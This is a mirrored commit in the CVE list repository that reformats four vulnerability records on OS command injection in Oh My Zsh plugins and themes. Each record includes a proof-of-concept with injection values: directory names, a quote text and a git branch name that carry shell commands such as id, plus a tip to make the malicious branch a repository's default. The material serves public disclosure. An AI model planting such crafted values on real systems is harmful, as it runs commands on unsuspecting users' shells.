admin/cvelist
1
0
Fork 0
mirror of https://github.com/CVEProject/cvelist.git synced 2025-07-29 05:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

"-Synchronized-Data."

Browse Source
This commit is contained in:
CVE Team 2021-11-30 10:01:04 +00:00
parent f801885bb8
commit ed428eba4e
No known key found for this signature in database
GPG Key ID: 5708902F06FEF743
4 changed files with 279 additions and 279 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

152
2021/3xxx/CVE-2021-3725.json
View File

@ -1,86 +1,86 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3725",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3725",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"06fc5fb"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "06fc5fb"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in dirhistory plugin\n\nDescription: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection.\n\nImpacted areas:\n\n- Functions pop_past and pop_future in dirhistory plugin."
}
]
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin."
}
]
},
"exploit": [
{
"lang": "eng",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory';id;echo 'pwned\"\n mkdir \"$baddir\" && cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ <Alt-Left>\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
{
"lang": "eng",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory';id;echo 'pwned\"\n mkdir \"$baddir\" && cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ <Alt-Left>\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
]
}
}
}

134
2021/3xxx/CVE-2021-3726.json
View File

@ -1,42 +1,42 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3726",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3726",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"a263cdac"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "a263cdac"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `title` function\n\n**Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe.\n\n**Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac).\n\n**Impacted areas**:\n\n- `title` function in `lib/termsupport.zsh`.\n- Custom user code using the `title` function."
"value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."
}
]
},
@ -46,41 +46,41 @@
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir='`echo pwned && id`'\n mkdir \"$baddir\" && cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n ![2 title_function poc](https://user-images.githubusercontent.com/1441704/142874935-341ddd3c-21e8-4b9e-a5c1-77c0b3debacc.png)"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
]
}
}
}

136
2021/3xxx/CVE-2021-3727.json
View File

@ -1,86 +1,86 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3727",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3727",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"72928432"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "72928432"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins\n\n**Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use.\n\n**Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432).\n\n**Impacted areas**:\n\n- `rand-quote` plugin (`quote` function).\n- `hitokoto` plugin (`hitokoto` function)."
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."
}
]
},
"exploit": [
{
"lang": "eng",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: “Whatever you fear most has no powerPWNED - it is your fear that has the power.”\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"她拨弄琴弦,$(echo PWNED)扬起潮汐。\",\"type\":\"e\",\"from\":\"原创\",\"from_who\":\"我\",\"creator\":\"鸢尾\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n 原创: “她拨弄琴弦PWNED扬起潮汐。”\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/72928432",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
]
}
}
}

136
2021/3xxx/CVE-2021-3769.json
View File

@ -1,86 +1,86 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3769",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3769",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"b3ba9978"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "b3ba9978"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes\n\n**Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited.\n\n**Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978).\n\n**Impacted areas**:\n\n- `pygmalion` theme.\n- `pygmalion-virtualenv` theme.\n- `refined` theme."
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
}
]
},
"exploit": [
{
"lang": "eng",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
]
}
}
}